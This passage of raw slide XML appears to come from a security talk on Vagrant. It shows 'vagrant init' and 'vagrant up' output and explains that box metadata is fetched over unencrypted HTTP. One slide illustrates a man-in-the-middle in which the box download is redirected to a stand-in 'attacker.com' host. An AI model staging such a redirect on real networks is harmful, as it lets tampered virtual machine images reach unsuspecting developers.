                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>found...  default: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Box </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Provider:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="90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virtualbox</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="10033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default: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Box Version: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>&gt;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=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill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1A177D"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="100965" marR="1346835" indent="-78105">
              <a:lnSpc>
                <a:spcPts val="1100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="35"/>
              </a:spcBef>
            </a:pP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==</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>&gt; default: Loading metadata </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007F00"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>box 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’debian/jessie64’  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>default: URL:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-35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  <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://vagrantcloud.com/debian/jessie64</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="22860">
              <a:lnSpc>
                <a:spcPts val="1050"/>
              </a:lnSpc>
            </a:pP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==</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>&gt; default: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Adding </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>box 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’debian/jessie64’ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007F00"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>provider:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="1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virtualbox</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="10033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default: Downloading:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="7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https://atlas.hashicorp.com/debian/jessie64/virtualbox.box</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9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5" dirty="0"/>
              <a:t>38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590" y="190436"/>
            <a:ext cx="1360170" cy="716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sz="1200" spc="-204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1200" spc="-170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BASICS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110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Terminology </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-145" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-120" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Workflow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3619" y="797596"/>
            <a:ext cx="3120555" cy="2274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17" y="190436"/>
            <a:ext cx="19323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>
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>THE SECURITY </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-155" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>VAGRANT</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-260" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-175" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>INIT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89" y="779800"/>
            <a:ext cx="3928110" cy="22326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100" spc="-204" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Command: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00" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>init &lt;box&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" dirty="0"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[</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>url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]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45" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Connection </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-165" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>over </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-140" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-229" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-165" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>(MiM)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00" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>init debian/jessie64</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="90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  <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://vagrantcloud.com/debian/jessie64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$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-1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up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Bringing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>machine 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’default’ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>up with 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’virtualbox’</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill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provider...</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90805" marR="980440" indent="-78105">
              <a:lnSpc>
                <a:spcPct val="101499"/>
              </a:lnSpc>
            </a:pP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==</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>&gt; default: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Box 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’debian/jessie64’ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>could not </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>found...  default: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Box </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Provider:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="90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virtualbox</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="9080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default: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Box Version: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>&gt;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=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill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1A177D"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90805" marR="951230" indent="-78105">
              <a:lnSpc>
                <a:spcPts val="1100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="35"/>
              </a:spcBef>
            </a:pP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==</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>&gt; default: Loading metadata </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007F00"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>box 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’debian/jessie64’  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>default: URL:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-35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  <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://vagrantcloud.com/debian/jessie64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ts val="1050"/>
              </a:lnSpc>
            </a:pP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==</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>&gt; default: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Adding </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>box 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’debian/jessie64’ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007F00"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>provider:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="2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virtualbox</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="9080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default: Downloading:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="90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  <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://attacker.com/debian/jessie64/virtualbox.box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900" spc="-140" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Note: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>see </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Appendix </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-65" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-65" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>illustrated </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>example </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>using the Burp</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-130" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Suite.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5" dirty="0"/>
              <a:t>39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17" y="190436"/>
            <a:ext cx="19323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>
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>THE SECURITY </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-155" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>VAGRANT</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-260" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-175" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>INIT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89" y="1092371"/>
            <a:ext cx="3302635" cy="107251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100" spc="-204" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Command: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900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>update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100" spc="-145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Connection </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-165" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>over</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-220" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-165" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>HTTP(s):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==</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>&gt; A </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>newer version </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>of the box </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>’ubuntu/trusty64’ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="65" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>available!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==</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-30" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>You </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>currently </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-20" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>have </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>version</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="35" dirty="0"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’20160601.0.0’</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>.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==</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Run </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>box </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>update</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>update.</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9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589" y="2530908"/>
            <a:ext cx="26866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40" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Note: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>update </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>might </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>also </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>insecure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spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>connection!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5" dirty="0"/>
              <a:t>40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17" y="190436"/>
            <a:ext cx="18465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>
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>THE SECURITY </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-275" dirty="0">
